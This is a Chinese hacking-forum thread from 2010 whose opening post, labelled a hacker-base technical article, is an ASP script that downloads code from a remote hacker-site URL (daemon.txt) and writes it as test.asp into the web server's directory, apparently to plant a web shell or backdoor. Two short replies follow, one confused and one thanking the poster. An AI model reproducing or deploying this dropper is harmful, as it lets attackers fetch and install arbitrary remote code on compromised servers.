WPE|52wpe|我爱WPE

 找回密码
 注册会员
搜索
  • 2575查看
  • 2回复

主题

好友

1936

积分

金牌会员

发表于 2010-1-18 23:24:26 |显示全部楼层
《新概念黑客基地》技术文章
<%
Function GetPage(url)
dim Retrieval
Set Retrieval = CreateObject("Microsoft.XMLHTTP")
With Retrieval
.Open "Get", url, False ', "", ""
.Send
GetPage = BytesToBstr(.ResponseBody)
End With
Set Retrieval = Nothing
End Function

Function BytesToBstr(body)
dim objstream
set objstream = Server.CreateObject("adodb.stream")
objstream.Type = 1
objstream.Mode =3
objstream.Open
objstream.Write body
objstream.Position = 0
objstream.Type = 2
objstream.Charset = "GB2312"
BytesToBstr = objstream.ReadText
objstream.Close
set objstream = nothing
End Function
on error resume next
Url="http://www.heibai.org/hacker/daemon.txt"
response.write "开始取得远程代码........"
wstr = GetPage(Url)

Set fs=Server.CreateObject("Scripting.FileSystemObject")

Set CrFi=fs.CreateTextFile(server.MapPath("./")&"\test.asp")
Crfi.Writeline(wstr)
set CrFi=nothing
set fs=nothing
response.write "...生成test.asp文件成功"
%>

主题

好友

380

积分

中级会员

发表于 2010-1-19 16:27:46 |显示全部楼层
这是什么啊?看不懂。。。。

回复

使用道具 举报

主题

好友

614

积分

高级会员

发表于 2011-2-15 21:48:04 |显示全部楼层
谢谢楼主分享了啊,
回复

使用道具 举报

快速发帖

您需要登录后才可以回帖 登录 | 注册会员

手机版|Archiver|WPE|52wpe|我爱WPE ( 闽ICP备15009081号 )

GMT+8, 2024-4-27 23:09 , Processed in 0.059571 second(s), 16 queries .

返回顶部